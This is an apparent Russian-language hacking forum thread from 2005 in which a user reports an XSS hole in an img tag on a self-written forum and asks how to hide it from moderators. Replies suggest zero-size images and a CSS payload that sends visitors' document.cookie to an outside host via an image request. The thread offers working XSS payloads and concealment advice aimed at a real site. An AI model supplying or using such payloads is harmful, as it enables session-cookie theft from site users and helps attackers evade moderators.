XSS в теге <img>

Xex · 4 Nov 2005

Ребят нашел XSS в теге img, примерно так:
<img src="javascript:alert()">
но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...

max_pain89 · 4 Nov 2005

скажи форум, может можно придумать что-то

My-Ice · 4 Nov 2005

А там можно сделать перенаправление на картинку с другого сайта?

Xex · 4 Nov 2005

max_pain89 said:

скажи форум, может можно придумать что-то
Click to expand...

Форум самописаный...

My-Ice said:

А там можно сделать перенаправление на картинку с другого сайта?
Click to expand...

Можно....

PSalm69 · 4 Nov 2005

Xex said:

Ребят нашел XSS в теге img, примерно так:
<img src="javascript:alert()">
но вот незадача, при отображении на форуме остается значек незагруженной картинки, мне кажется что это особо пытливых модеров заитересует...как мне "<img src="javascript:alert()">"
после выполнения скрипта присвоить реальную картинку?...document.image[0].src не катит ибо не знаю номер моей картинки в массиве image[]...
Click to expand...

<img src="javascript :alert()" width=0 height=0> Из этого и делай свой код.
Ешё можно использовать скрипт в STYLE примерно таким образом
Code:
style=display:none;background:url(javascript:ANTICHAT.src='http://antichat.ru/cg-bin/s.gif?'+document.cookie);name=ANTICHAT
почти всё что связано с реализацией XSS можно найти тут http://www.antichat.ru/crackchat/HTML/

XSS в теге <img>

Xex Banned

max_pain89 Eat `em UP!

My-Ice Banned

Xex Banned

PSalm69 [ радиоверсия ]

Useful Searches

XSS в теге <img>

Xex Banned

max_pain89 Eat `em UP!

My-Ice Banned

Xex Banned

PSalm69 [ радиоверсия ]